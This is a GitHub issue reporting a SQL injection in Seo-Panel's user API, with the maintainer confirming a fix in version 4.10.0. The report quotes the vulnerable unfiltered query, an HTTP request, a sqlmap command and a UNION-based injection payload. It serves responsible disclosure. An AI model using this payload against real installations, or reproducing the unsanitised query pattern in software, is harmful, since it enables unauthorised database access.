Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL Injection Vulnerability in API function (user.api.php) #219

Closed
victomteng1997 opened this issue Jun 7, 2021 · 2 comments
Closed

SQL Injection Vulnerability in API function (user.api.php) #219

victomteng1997 opened this issue Jun 7, 2021 · 2 comments
Assignees
Labels
Projects
Milestone

Comments

@victomteng1997
Copy link

Hi there,

I want to report a SQL Injection Vulnerability in the the current API implementation of Seo-Panel.
In api/user.api.php, the function getUserName directly calls function __checkUserName in controllers/user.ctrl.php file without filtering on variables. Attacker can pass arbitrary string to username variable through $info. This allows injection to the __checkUsername function directly:

getUserName:

function getUserName($info) {
    
         		$username = $info['username']; 
        		$returnInfo = array();      
        		// validate the user ifd and user info
     		        if (!empty($username)) {      
        			if ($userInfo = $this->ctrler->__checkUserName($username)) {      
        				$returnInfo['response'] = 'success';
   
        				$returnInfo['result'] = $userInfo;
     
        				return $returnInfo;
    
        			}
      
        		}
    
        		$returnInfo['response'] = 'Error';      
        		$returnInfo['error_msg'] = "Invalid username provided";      
        		return  $returnInfo;
        	}

__checkUserName:

	function __checkUserName($username){
         		$sql = "select id from users where username='$username'";  
        		$userInfo = $this->db->select($sql, true);      
        		return empty($userInfo['id']) ? false :  $userInfo['id'];      
        	}

The above-mentioned vulnerability can be reproduced by sqlmap through a request file injection.txt:

POST /seopanel/api/api.php HTTP/1.1
Host: localhost
Accept: */*
Content-Length: 118
Content-Type: application/x-www-form-urlencoded
Connection: close

SP_API_KEY=<key_here>&API_SECRET=<secret>&category=user&action=getUserName&username=spadmin

with sqlmap command: sqlmap -r injection.txt -p 'username'. A boolean-based blind injection shall work, with payload similar to:
username=123' UNION ALL SELECT CONCAT(CONCAT('abc','abc'),'abc')-- (do note that there's one space at the end of variable to bypass the original quotation mark).

@sendtogeo
Copy link

Thanks a lot for finding it and updating us.

Thanks for your great support.

We will release fix for it in this month release 4.10.0 version 👍

@sendtogeo sendtogeo added this to the 4.10.0 milestone Jun 7, 2021
@sendtogeo sendtogeo self-assigned this Jun 7, 2021
@sendtogeo sendtogeo added the bug label Jun 7, 2021
sendtogeo pushed a commit that referenced this issue Aug 29, 2021
@sendtogeo
Copy link

Fixed i the latest version 4.10.0

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
Seo Panel
Awaiting triage
Development

No branches or pull requests

2 participants